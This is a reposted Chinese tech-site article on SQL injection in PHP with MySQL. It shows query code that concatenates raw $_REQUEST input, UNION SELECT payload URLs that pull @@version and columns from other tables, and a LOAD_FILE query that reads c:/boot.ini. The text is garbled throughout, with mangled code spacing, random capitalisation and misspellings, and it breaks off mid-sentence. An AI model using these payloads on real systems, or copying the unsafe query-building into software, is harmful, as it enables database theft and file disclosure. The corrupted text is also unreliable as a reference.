2. Tech
  3. Inject attack on PHP + MySQL

Inject attack on PHP + MySQL

xiaoxiao2021-03-06  56

Inject attack on PHP MySQL

Take a look at the content of the following

$ query = "SELECT * from user where user = '". $ _ request [' user '] .. "'";

... SQL INJECTION IS IMPOSIBLE.HOWEVER, IF THE VALUE IS Being Placed in A Non-Delimited

Portion of the Query, Such as a Numeric Value, Table or Column Name:

$ query = "Select * from user order by". $ _ request ['user']; or

$ query = "SELECT * from user where max_connections =". $ _ request ['user'];

... The SQL INJECTION IS STILL POSSIBLE.

There is also a way to inject

$ query = "SELECT * from user where user = ($ _ request ['user'])

If we want to return other useful data - apart from the '' user'table - we can use the 'UNION'statement to combine two resultsets.Since the' UNION'statement comes after the 'WHERE'clause in a select statement, we can choose any data we like, within the following restrictions: • Our select statement must return the same number of fields as the original (31 if you count them, or do a 'describe user') • The data types of our fields must. match, or it must be possible to implicitly convert between the two • If our data contains text fields, they will be truncated to the length of the corresponding text field in the first query Let's say we want to return the '@@ version'string .We would request something like: http://mysql.example.com/query.php?user=1 Union select @@version, 1, 1, 1, 1, 1, 1, 1, 1 ,1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 we can select Arbitrary Fields from Tables in Other Tables Using Union Select.for Example, Suppose We Wanted to Retrieve The 'Name'and' DL'Fields from The 'Func'table: h TTP: //mysql.example.com/query.php? user = 1 Union SELECT NAME, DL, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 From Func Using 'Union', An Attacker CAN Effectively Access All of Thae data that the calling application can access LOAD_FILE function The LOAD_FILE function returns a string containing the contents of a file, specified by it's path.So, for example on a windows box, the query select load_file (. 'c: /boot.ini' ); ... Will Retrieve The Contents of the Boot.ini File. Obviously ethadi file. Obviously inte

转载请注明原文地址:https://www.9cbs.com/read-112908.html

9cbs

New Post(0)